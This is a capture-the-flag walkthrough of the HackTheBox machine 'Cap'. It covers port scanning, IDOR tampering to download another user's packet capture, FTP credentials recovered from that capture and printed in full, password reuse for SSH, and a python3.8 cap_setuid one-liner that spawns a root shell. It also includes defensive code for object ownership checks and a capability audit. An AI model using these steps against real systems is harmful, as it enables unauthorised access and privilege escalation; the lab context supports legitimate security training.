Cap Writeup / Walkthrough Hack the box

TL;DR

This is a walkthrough of Cap, a Linux box rated Easy on HackTheBox. The initial foothold came from a parameter-tampering vulnerability in the web application, which exposed a packet capture containing FTP credentials; the same credentials were valid for SSH because of password reuse. Privilege escalation was straightforward: we abused the cap_setuid file capability set on the python3.8 binary.

Cap Writeup: Scanning Network

Running the usual Nmap port scan:

Command used --> nmap -n -Pn -A -sC -sV -v -oN nmap.initial 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.19s latency).
Not shown: 997 closed ports

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 3.0.3

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Mon, 25 Oct 2021 05:12:02 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 25 Oct 2021 05:11:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 25 Oct 2021 05:11:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-server-header: gunicorn
|_http-title: Security Dashboard

We have:
port 21: FTP (vsftpd 3.0.3)
port 22: SSH (OpenSSH 8.2p1)
port 80: web server (gunicorn)

I checked for anonymous FTP login, but it was disabled.

Running a DirBuster Scan

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

--------------------------------

http://10.10.10.245:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/ip
/netstat
/static/js/vendor/modernizr-2.8.3.min.js
/static/js/popper.min.js
/static/js/bootstrap.min.js
/static/js/metisMenu.min.js
/static/js/owl.carousel.min.js
/static/js/jquery.slimscroll.min.js
/static/js/jquery.slicknav.min.js
/static/js/vendor/jquery-2.2.4.min.js
/static/js/plugins.js
/static/js/pie-chart.js
/static/js/scripts.js
/static/js/line-chart.js

Files found with a 302 responce:

/capture


--------------------------------

Let’s go ahead with the website enumeration.

Website Enumeration

[Image: homepage]
[Image: the ipconfig option shows the output of the ifconfig command]
[Image: the Network Status option shows the output of the netstat command]
[Image: Security Snapshot (5 second PCAP + Analysis)]

Cap Writeup : Initial Foothold

  • I tried to intercept the requests with Burp Suite.
  • Initially I thought that the requests for the “ipconfig” and “netstat” pages contained the command executed on the server, and that I could simply replace it with a reverse shell. That was not the case.
  • The Security Snapshot (5 Second PCAP + Analysis) option, however, let us download a PCAP file.
  • By default it served /data/1, but when I tampered with this parameter I found that a /data/0 file also existed, and it seemed to contain useful data.
  • Any id after 0 returned no data, as seen in the images below:
What is a .pcap file?

Packet Capture (PCAP) files are data files written by packet-capture tools such as Wireshark. They contain the raw packets recorded from a network interface and are mainly used to analyse the traffic on that network.
[Image: /data/ parameter]

Downloading the /data/0 PCAP file as it has some data.

[Image: Downloading the /data/0 PCAP file]

Opening & examining that PCAP file with Wireshark -->

The 1.pcap file was empty, while 0.pcap had data!
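The root cause of the foothold is that /data/<id> trusts whatever id the client puts in the URL and never checks who owns that capture. As an added example that is not the box's code, here is a minimal WSGI handler (the kind of callable gunicorn serves) with the vulnerable lookup beside a hardened one that enforces ownership; the capture store, the "admin" owner and the X-Session-User header are assumptions.

```python
import re

# Constructed sample store modelled on the dashboard's /data/<id> downloads:
# capture id -> (owner, pcap bytes). Not data from the box.
CAPTURES = {
    0: ("admin", b"\xd4\xc3\xb2\xa1...admin's earlier capture..."),
    1: ("nathan", b"\xd4\xc3\xb2\xa1"),  # header only: an empty capture
}

# Bounded digit count so a huge id cannot trigger int() parsing limits.
ROUTE = re.compile(r"^/data/(\d{1,9})$")


def vulnerable_lookup(path):
    """The IDOR pattern: any id present in the URL is served, so tampering
    /data/1 -> /data/0 yields another user's capture."""
    m = ROUTE.match(path)
    record = CAPTURES.get(int(m.group(1))) if m else None
    return (200, record[1]) if record else (404, None)


def create_capture(user, pcap_bytes):
    """Allocate the next id, record the requesting user as owner and return
    the redirect target (the /capture -> 302 -> /data/<id> flow)."""
    cid = max(CAPTURES, default=-1) + 1
    CAPTURES[cid] = (user, pcap_bytes)
    return f"/data/{cid}"


def hardened_lookup(path, session_user):
    """Authorisation check on every object access: the id still comes from
    the URL, but the record is only served to its owner. Non-owners and
    unknown ids both get 404, so the response does not reveal which ids exist."""
    m = ROUTE.match(path)
    if not m or session_user is None:
        return 404, None
    record = CAPTURES.get(int(m.group(1)))
    if record is None or record[0] != session_user:
        return 404, None
    return 200, record[1]


def app(environ, start_response):
    """Minimal WSGI entry point. The user is taken from a hypothetical header
    that an upstream session layer is assumed to set after authentication."""
    user = environ.get("HTTP_X_SESSION_USER")
    status, body = hardened_lookup(environ.get("PATH_INFO", ""), user)
    start_response("200 OK" if status == 200 else "404 Not Found",
                   [("Content-Type", "application/vnd.tcpdump.pcap")])
    return [body or b""]
```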

Examining the PCAP file

Opening the pcap file using Wireshark, we could see FTP packets. On following the TCP stream for those FTP packets, we were greeted with the FTP credentials 🙂

pcap file in wireshark
FTP credentials revealed
FTP Creds
user: nathan
pass: Buck3tH4TF0RM3!

Cap Writeup: User Flag ⛳

Logging in with those FTP creds :

┌─[root@kali]─[~/Desktop/Boxes/HTB/Cap]
└──╼ ftp $IP
Connected to 10.10.10.245.                                                                    
220 (vsFTPd 3.0.3)                                                                            
Name (10.10.10.245:root): nathan                                                              
331 Please specify the password.                                                              
Password:                                                                                     
230 Login successful.                                                                         
Remote system type is UNIX.                                                                   
Using binary mode to transfer files.

ftp> pwd
257 "/home/nathan" is the current directory

ftp> ls                                             
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--------    1 1001     1001           33 Oct 25 05:03 user.txt
226 Directory send OK.     
                 
ftp> get user.txt                                                                             
local: user.txt remote: user.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for user.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (19.9917 kB/s)

-------------------------------------------------------------------------------------

cat user.txt 
cb580***************************

Privilege Escalation

We also tried those FTP creds for SSH, because you never know, and indeed 😉 we were able to SSH into the box as user nathan with those creds.

ssh nathan@$IP
  • We went ahead and searched for sudo permissions, SUID binaries and file capabilities that could escalate our privileges to a root shell.
  • As the box name “Cap” hints at exploiting capabilities, it was no surprise to find cap_setuid set on the python3.8 binary on the target.
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Checking GTFOBins for the above capability --> python | GTFOBins
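A defender can run the same getcap enumeration as a periodic check. The following added script (not from the writeup or the box) parses getcap -r output in the shape shown above and ranks each entry, treating a cap_setuid-style capability on an interpreter as critical; the dangerous-capability list and the interpreter pattern are my assumptions, and the newer libcap layout without the "=" is also handled.

```python
import re
from pathlib import PurePosixPath

# Constructed sample, copied in shape from the getcap -r / output in this writeup.
GETCAP_OUTPUT = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Capabilities that amount to root: change identity, bypass DAC, load modules, ...
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_module", "cap_sys_ptrace", "cap_fowner", "cap_chown"}
# Programs that run caller-supplied code: a dangerous cap here is usable by anyone who can execute them.
INTERPRETER = re.compile(r"^(python|perl|ruby|node|php|lua|gdb|vim)[\d.]*$")

# Accepts the older "path = caps+flags" layout and the newer "path caps=flags" layout.
LINE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>cap_[a-z_]+(?:,cap_[a-z_]+)*)[+=](?P<flags>[eip]+)\s*$")


def parse_getcap(text):
    """Return (path, set_of_caps, flags) for each well-formed getcap line; skip the rest."""
    out = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            out.append((m["path"], set(m["caps"].split(",")), m["flags"]))
    return out


def audit(text):
    """Rank each capability-bearing file. 'critical' = dangerous cap on an interpreter
    (the python3.8 case on this box), 'high' = dangerous cap on any other binary, else 'info'.
    A cap only in the inheritable set ('i' without 'p') is not granted to ordinary callers."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        bad = sorted(caps & DANGEROUS)
        usable = "p" in flags
        if bad and usable and INTERPRETER.match(PurePosixPath(path).name):
            sev = "critical"
        elif bad and usable:
            sev = "high"
        else:
            sev = "info"
        findings.append({"path": path, "caps": sorted(caps), "flags": flags, "severity": sev})
    return findings
```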


Root Flag ⛳

nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

root@cap:/root# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)

root@cap:~# pwd
/home/nathan

root@cap:~# cd /root

root@cap:/root# ls
root.txt  snap

root@cap:/root# cat root.txt 
0e13d***************************

That was it for Cap.

Until next time, do check out other informative writeups and blogs here.
